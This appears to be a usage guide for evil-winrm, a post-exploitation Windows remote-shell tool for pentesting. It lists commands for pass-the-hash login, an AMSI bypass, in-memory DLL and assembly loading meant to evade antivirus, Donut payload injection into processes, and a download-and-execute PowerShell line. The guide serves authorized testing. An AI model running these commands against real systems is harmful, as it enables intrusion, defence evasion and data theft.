WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.
This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.
It is based mainly in the WinRM Ruby library which changed its way to work since its version 2.0. Now instead of using WinRM protocol, it is using PSRP (Powershell Remoting Protocol) for initializing runspace pools as well as creating and processing pipelines.
WinRM typically uses port 5985 for HTTP and port 5986 for HTTPS communication. However, the tool allows you to specify the desired port during usage, offering flexibility based on network configurations and security considerations.
- 5985
- 5986
Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it’s utilising WMI, so you can think of it as an HTTP based API for WMI.
- Compatible to Linux and Windows client systems
- Load in memory Powershell scripts
- Load in memory dll files bypassing some AVs
- Load in memory C# (C Sharp) assemblies bypassing some AVs
- Load x64 payloads generated with awesome donut technique
- Dynamic AMSI Bypass to avoid AV signatures
- Pass-the-hash support
- Kerberos auth support
- SSL and certificates support
- Upload and download files showing progress bar
- List remote machine services without privileges
- Command History
- WinRM command completion
- Local files/directories completion
- Remote path (files/directories) completion (can be disabled optionally)
- Colorization on prompt and output messages (can be disabled optionally)
- Optional logging feature
- Docker support (prebuilt images available at Dockerhub)
- Trap capturing to avoid accidental shell exit on Ctrl+C
Ruby 2.3 or higher is needed. Some ruby gems are needed as well: winrm >=2.3.2, winrm-fs >=1.3.2, stringio >=0.0.2, logger >= 1.4.3, fileutils >= 0.7.2. Depending of your installation method (4 availables) the installation of them could be required to be done manually.
Another important requirement only used for Kerberos auth is to install the Kerberos package used for network authentication. For some Linux like Debian based (Kali, Parrot, etc.) it is called krb5-user. For BlackArch it is called krb5 and probably it could be called in a different way for other Linux distributions.
Installation & Quick Start (4 methods)
Method 1. Installation directly as ruby gem (dependencies will be installed automatically on your system)
Step 1. Install it (it will install automatically dependencies):
- gem install evil-winrm
Step 2. Ready. Just launch it!
- evil-winrm -i -u Administrator -p ‘MySuperSecr3tPass123!’ -s ‘/home/foo/ps1_scripts/’ -e ‘/home/foo/exe_files/’
Method 2. Git clone and install dependencies on your system manually
Step 1. Install dependencies manually:
- sudo gem install winrm winrm-fs stringio logger fileutils
Step 2. Clone the repo:
- git clone
Step 3. Ready. Just launch it!
- cd evil-winrm && ruby evil-winrm.rb -i -u Administrator -p ‘MySuperSecr3tPass123!’ -s ‘/home/foo/ps1_scripts/’ -e ‘/home/foo/exe_files/’
Method 3. Using bundler (dependencies will not be installed on your system, just to use evil-winrm)
Step 1. Install bundler:
- gem install bundler
Step 2. Clone the repo:
- git clone
Step 3. Install dependencies with bundler:
- cd evil-winrm && bundle install –path vendor/bundle
Step 4. Launch it with bundler:
- bundle exec evil-winrm.rb -i -u Administrator -p ‘MySuperSecr3tPass123!’ -s ‘/home/foo/ps1_scripts/’ -e ‘/home/foo/exe_files/’
Method 4. Using Docker
Step 1. Launch docker container based on already built image:
- docker run –rm -ti –name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i -u Administrator -p ‘MySuperSecr3tPass123!’ -s ‘/ps1_scripts/’ -e ‘/exe_files/’
How to use
1. Display help menu
- evil-winrm –help
Note: Notice the tool version at the top.
2. Log in using one of the accounts username/password
- evil-winrm -u admin1 -p Admin.123 -i
3. Connect using pass the hash
- evil-winrm –ip [ip] –user [user] –hash [nt_hash]
4. Display the console menu, and bypass AMSI
Windows AMSI (Antimalware Scan Interface): A Microsoft security feature that allows applications and scripts to be scanned for malicious content in real-time by interfacing with antivirus and antimalware products.
- menu
- Bypass-4MSI
5. Connect to a host, specifying directories for scripts and executables
- evil-winrm –ip [ip] –user [user] –password [password] –scripts [path/to/scripts] –executables [path/to/executables]
1. Connect to a host, using SSL
- evil-winrm –ip [ip] –user [user] –password [password] –ssl –pub-key [path/to/pubkey] –priv-key [path/to/privkey]
Upload Download files
1. Upload files
- upload [path/to/local/file] [path/to/remote/file]
- upload /home/kali/secret.txt C:\Users\admin1\Documents\secret.txt
2. Download files
- download [path/to/local/file] [path/to/remote/file]
- download C:\Users\admin1\Documents\Server_Secret.txt /home/kali/Server_Secret.txt
Import Powershell scripts
1. To load a powershell script download the script into the remote computer, display the menu and see all the methods/modules imported
- IEX(New-Object Net.WebClient).DownloadString(‘’)
- menu
2. Run the modules
- Get-Domain
3. (OPTIONAL) We can also log in specifying a local script folder, so, you just need to call it, without downloading it from the local machine
- evil-winrm -u admin1 -p Admin.123 -i -s ~/Documents/Tools/PowerSploit/Recon
- PowerView.ps1
Import DLL
1. Import DLL
- Dll-Loader
- Dll-Loader -smb -path \\\\share\\myDll.dll
- Dll-Loader -local -path C:\Users\Pepito\Desktop\myDll.dll
- Dll-Loader -http -path
Note: To call the scripts
- [SharpSploit.Enumeration.Net]::GetNetLocalGroupMembers()
Import Binary
1. Invoke a binary on the host from the –executables directory
- Invoke-Binary
- Invoke-Binary /opt/csharp/Watson.exe
- Invoke-Binary /opt/csharp/Binary.exe param1,param2,param3
- Invoke-Binary /opt/csharp/Binary.exe ‘param1, param2, param3’
Import Donut payloads
1. Donut-Loader: allows to inject x64 payloads generated with awesome donut technique. No need to encode the payload.bin, just generate and inject! (
- Donut-Loader
- Donut-Loader -process_id 2195 -donutfile /home/cybervaca/donut.bin
- Donut-Loader -process_id (get-process notepad).id -donutfile /home/cybervaca/donut.bin